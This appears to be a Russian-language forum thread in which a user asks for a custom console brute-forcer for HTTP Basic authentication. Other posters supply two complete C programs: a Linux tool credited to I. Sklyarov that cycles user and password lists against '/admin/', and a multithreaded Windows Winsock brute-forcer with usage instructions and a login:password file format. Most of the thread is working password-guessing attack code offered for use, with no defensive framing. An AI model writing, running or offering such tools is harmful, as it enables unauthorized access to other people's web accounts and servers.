Я сомневаюсь что ктото здесь будет писать за тебя. Начинай и если будут вопросы задавай и юзеры постораються ответить.
если бы мне нужен был брутус я бы не спрашивал..мне нужен свой консольный брут...искал в инете инфу чтот ничего путного не нашёл
тоесть : "GET /private/index.html HTTP/1.0 Host: localhost Authorization: Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(username + ":" + Password)) а именно: строку в хидер: Authorization: Basic ... + строку вида : Логин и Пароль через двоеточие - в Base64 ...
пример под линух by И.Скляров.. Code: #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #define USER "users.txt" #define PASS "words.txt" #define CATALOG "/admin/" static char table64[]= "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char *port_host; char *name; void token(char *arg) { name = strtok(arg, ":"); port_host = strtok(NULL, ""); if (port_host == NULL) port_host = "80"; } void base64Encode(char *intext, char *output) { unsigned char ibuf[3]; unsigned char obuf[4]; int i; int inputparts; while(*intext) { for (i = inputparts = 0; i < 3; i++) { if(*intext) { inputparts++; ibuf[i] = *intext; intext++; } else ibuf[i] = 0; } obuf [0] = (ibuf [0] & 0xFC) >> 2; obuf [1] = ((ibuf [0] & 0x03) << 4) | ((ibuf [1] & 0xF0) >> 4); obuf [2] = ((ibuf [1] & 0x0F) << 2) | ((ibuf [2] & 0xC0) >> 6); obuf [3] = ibuf [2] & 0x3F; switch(inputparts) { case 1: /* only one byte read */ sprintf(output, "%c%c==", table64[obuf[0]], table64[obuf[1]]); break; case 2: /* two bytes read */ sprintf(output, "%c%c%c=", table64[obuf[0]], table64[obuf[1]], table64[obuf[2]]); break; default: sprintf(output, "%c%c%c%c", table64[obuf[0]], table64[obuf[1]], table64[obuf[2]], table64[obuf[3]] ); break; } output += 4; } *output=0; } int main(int argc, char **argv) { FILE *fd1, *fd2; int sd, bytes; char buf1[250], buf2[250]; char buf[250]; char str1[270], str2[100]; struct hostent* host; struct sockaddr_in servaddr; char rez[2000]; char c[600]; if (argc < 2 || argc > 3) { fprintf(stderr, "Usage: %s host[:port] [proxy][:port]\n\n", argv[0]); exit(-1); } if (argc == 3) token(argv[2]); else token(argv[1]); if ( (host = gethostbyname(name)) == NULL) { herror("gethostbyname() failed"); exit(-1); } bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons(atoi(port_host)); servaddr.sin_addr = *((struct in_addr *)host->h_addr); if ( (fd1 = fopen(USER, "r")) == NULL) { perror("fopen() failed"); exit(-1); } while(fgets(buf1, 250, fd1) != NULL) { buf1[strcspn(buf1, "\r\n\t")] = 0; if (strlen(buf1) == 0) continue; if( (fd2 = fopen(PASS, "r")) == NULL) { perror("fopen() failed"); exit(-1); } while(fgets(buf2, 250, fd2) != NULL) { buf2[strcspn(buf2, "\r\n\t")] = 0; if (strlen(buf2) == 0) continue; sprintf(c, "%s:%s", buf1, buf2); base64Encode(c, rez); if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror("socket() failed"); exit(-1); } if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) { perror("connect() failed"); exit(-1); } if (argc == 2) sprintf(str1, "GET %s HTTP/1.1\r\n", CATALOG); else sprintf(str1, "GET http://%s%s HTTP/1.1\r\n", argv[1], CATALOG); sprintf(str2, "Host:%s\r\nAuthorization: Basic %s\r\n\r\n", argv[1], rez); send(sd, str1, strlen(str1), 0); send(sd, str2, strlen(str2), 0); bzero(buf, 250); bytes = recv(sd, buf, sizeof(buf)-1, 0); buf[bytes] = 0; if (strstr(buf, "200 OK") != NULL) { printf("======================================\n"); printf("%s", str1); printf("%s\n", str2); printf("Result OK: %s\n", c); printf("======================================\n"); } close(sd); } } return 0; }
Тоже написал Code: #include <winsock2.h> #include <stdio.h> #include <conio.h> #pragma comment(lib,"ws2_32") #define PACK "GET %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n" #define KR 128 //////////////////////////////////////////////////////////////////////// FILE *fr; char pack[128]; int CurThr; sockaddr_in ClientService; int CLsize; char host[128]; char path[128]; int THR; int PL; int so; int p_good, p_bad, p_er; int fl; char fwr[128]; struct pp{ char p[128]; int st; int tr; }; pp *pass; static const unsigned char base64digits[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; #define BAD 255 static const unsigned char base64val[] = { BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD, BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD, BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD }; #define DECODE64(c) ((c > 32 && c<127)? base64val[(int)c] : BAD) char* en64 (const char *in, char *out, int inlen) { for (; inlen > 0; inlen -= 3, in+=3) { *out++ = base64digits[in[0] >> 2]; *out++ = base64digits[((in[0]&3)<<4) | ((inlen > 1)?(in[1]>>4):0)]; *out++ = (inlen > 1)? base64digits[((in[1] << 2) & 0x3c) | ((inlen > 2)? (in[2] >> 6) : 0)]: '='; *out++ = (inlen > 2)? base64digits[in[2] & 0x3f] : '='; } *out = '\0'; return out; } DWORD WINAPI check(LPVOID i) { char header[256]; char b64t[200]; en64(pass[(int)i].p, b64t, strlen(pass[(int)i].p)); sprintf(header, pack, b64t); SOCKET ksocket; int len; char buff[32]; FILE *fw; ksocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(connect( ksocket, (SOCKADDR*) &ClientService, CLsize ) == SOCKET_ERROR) { pass[(int)i].tr = 0; CurThr--; p_er++; return false; } len = send(ksocket, header, strlen(header), 0); if(len == SOCKET_ERROR) { pass[(int)i].tr = 0; CurThr--; p_er++; return false; } buff[recv(ksocket, buff, 32, 0)] = '\0'; if(strstr(buff, "200 OK") != NULL) { if(fl) Sleep(50); fl=1; fw=fopen(fwr, "ab"); fprintf(fw,"%s\n", pass[(int)i].p); fclose(fw); fl=0; p_good++; } else p_bad++; closesocket(ksocket); pass[(int)i].st=0; pass[(int)i].tr = 0; CurThr--; PL--; return true; } DWORD WINAPI READ(LPVOID x) { int i; for(i=0; i<KR; i++) { pass[i].st=0; pass[i].tr=0; } i=0; while(!feof(fr)) { if(i >= KR) i=0; if(pass[i].st == 0 && pass[i].tr == 0) { fgets(pass[i].p, 128, fr); pass[i].p[strcspn(pass[i].p, "\r\n\t")] = 0; pass[i].st=1; PL++; } i++; } PL--; fclose(fr); return true; } DWORD WINAPI info(LPVOID x) { while(so) { system("cls"); printf("Target: %s%s\n", host, path);; printf("Thread: %d/%d\n", CurThr, THR); printf("Founr: %d\n", p_good); printf("Bad: %d\n", p_bad); printf("Error: %d\n", p_er); Sleep(500); } return true; } int main(int argc, char *argv[]) { if(argc < 6) { printf("USE: host path tread filePass fileResult\n"); return 0; } strcpy(host, argv[1]); strcpy(path, argv[2]); THR=atoi(argv[3]); strcpy(fwr, argv[5]); fr=fopen(argv[4], "rb"); if(!fr) { printf("File not found\n"); return 0; } WSADATA wsaData; if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { printf("Error at WSAStartup()\n"); return 0; } struct hostent *Ip = gethostbyname(host); if(Ip == NULL) { printf("Error at gethostbyname()\n"); return 0; } ClientService.sin_family = AF_INET; ClientService.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); ClientService.sin_port = htons(80); CLsize=sizeof(ClientService); DWORD thID; pass = new pp[KR]; CurThr=0; p_good=0; p_bad=0; p_er=0; int i=0; PL=1; so=1; fl=0; sprintf(pack, PACK, path, host, "%s"); CreateThread(0, 0, READ, (LPVOID)0, 0, &thID); CreateThread(0, 0, info, (LPVOID)0, 0, &thID); Sleep(1000); while(PL != 0 || CurThr != 0) { if(CurThr >= THR) { Sleep(100); continue; } if(i >= KR) i=0; if(pass[i].st == 1 && pass[i].tr == 0) { pass[i].tr = 1; CurThr++; CreateThread(0, 0, check, (LPVOID)i, 0, &thID); } i++; } fclose(fr); Sleep(1000); so=0; system("pause"); return 1; } USE: host path tread filePass fileResult например brut.exe localhost /1.php 50 pass.txt result.txt файл с паролямив форммате Code: логин:пароль логин:пароль логин:пароль
